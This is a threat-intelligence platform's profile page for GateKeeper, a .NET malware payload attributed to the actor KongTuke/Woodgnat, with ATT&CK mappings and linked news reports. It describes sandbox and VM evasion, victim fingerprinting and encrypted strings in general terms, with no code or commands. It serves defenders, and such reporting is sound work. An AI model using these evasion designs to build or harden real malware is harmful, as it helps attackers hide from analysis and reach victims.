Skip to main content
Live Webinar with SANS (June 25)— Agentic CTI Automation for Fun & ProfitRegister Free
Mallory
Back to malware
MalwareUsed by 2 actors

GateKeeper

GateKeeper is a .NET payload associated with the financially motivated threat actor KongTuke, also tracked as Woodgnat. The provided reporting describes it as an encrypted .NET payload with layered string encryption, extensive anti-analysis logic, and victim-fingerprinting functionality. In the observed KongTuke infection chain, GateKeeper appeared in the non-domain-host branch after PowerShell-based staging and environment checks. Its Main() routine was described as building a fingerprint of the victim machine by performing a gauntlet of anti-analysis checks, and the broader chain included checks for analysis tools and virtualized environments as well as host profiling to determine payload selection. The content links GateKeeper to KongTuke operations that used social-engineering lures such as CrashFix/ClickFix-style techniques and selective payloading, with GateKeeper used as part of a more obfuscated path intended to withhold follow-on payloads from sandboxes and other analysis environments. No standalone IOCs specific to GateKeeper were provided in the content.

Share:
For your environment

Hunt this family in your stack

Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.

Start free trial
THREAT ACTORS

Groups observed using it

2 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.

View more details
Woodgnat

GateKeeper : A .NET payload featuring layered encryption and extensive anti-analysis and victim-fingerprinting logic.

via symantec blogsecurity.com
KongTuke

KongTuke is known to use multiple other tools, such as ... the encrypted GateKeeper .NET payload...

via bleeping computerbleepingcomputer.com
MITRE ATT&CK

Techniques & procedures

3 distinct techniques documented for this family, organized by ATT&CK tactic.

Execution

1 technique
T1059.001PowerShellEvidence1

In each case the victim is ultimately tricked into running an attacker-supplied PowerShell command... Once a command is executed, a multi-stage PowerShell chain downloads and unpacks a portable WinPython environment and launches the ModeloRAT Python scripts.

Stealth

2 techniques
T1497Virtualization/Sandbox EvasionEvidence1

Lure and loader stages routinely profile the victim host for analysis tools and virtual-machine indicators

T1497.001System ChecksEvidence1

Lure and loader stages routinely profile the victim host for analysis tools and virtual-machine indicators and distinguish domain-joined corporate machines from standalone WORKGROUP hosts so that the higher-value ModeloRAT payload is reserved for enterprise targets.

Discovery

2 techniques
T1497Virtualization/Sandbox EvasionEvidence1

Lure and loader stages routinely profile the victim host for analysis tools and virtual-machine indicators

T1497.001System ChecksEvidence1

Lure and loader stages routinely profile the victim host for analysis tools and virtual-machine indicators and distinguish domain-joined corporate machines from standalone WORKGROUP hosts so that the higher-value ModeloRAT payload is reserved for enterprise targets.

ACTIVITY FEED

Recent activity

8 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.

8 SOURCESView more in app
bleeping computerNews
Jun 24, 2026
Stealthy Mistic backdoor linked to ransomware access broker KongTuke

An encrypted .NET payload used by KongTuke as part of its toolset.

Read more
symantec blogNews
Jun 24, 2026
Backdoor.Mistic: New Backdoor May be Linked to Ransomware Access Broker | SECURITY.COM

A .NET payload used in Woodgnat attack chains that employs layered encryption, anti-analysis measures, and victim fingerprinting.

Read more
huntress blogNews
Jan 20, 2026
Dissecting CrashFix: KongTuke's New Toy | Huntress

.NET loader/payload component in the KongTuke chain featuring layered string encryption (AES-256-CBC + XOR), extensive anti-analysis/VM/sandbox fingerprinting, and C2 decisioning based on a numeric fingerprint score to withhold real payloads from researchers/sandboxes.

Read more
huntress blogNews
Jan 20, 2026
Dissecting CrashFix: KongTuke's New Toy | Huntress

.NET loader/payload component in the KongTuke chain featuring layered string encryption (AES-256-CBC + XOR), extensive anti-analysis and environment fingerprinting to gate payload delivery, and C2 logic that can withhold real payloads in suspected analysis environments (observed returning 'TEST PAYLOAD!!!!' in testing).

Read more
+4 more in the timeline
What this page doesn’t show

The version that knows your environment.

This page is what’s public. Mallory adds the parts that aren’t: which of your assets match these IOCs, which detections are missing, which campaigns to expect next, and what to do in the next 30 minutes.
Start free trial
IOC matching

Match every observed IP, domain, and hash against your live telemetry.

Threat actor attribution2

Named campaigns wielding this family, with evidence pinned to each claim.

Exploited vulnerabilities

CVEs this family uses for access and lateral movement.

Detection signatures

YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.

MITRE ATT&CK mapping3

Every documented technique, ranked by evidence weight.

Researcher chatter

Reddit, Mastodon, and CTI community discussion around this family.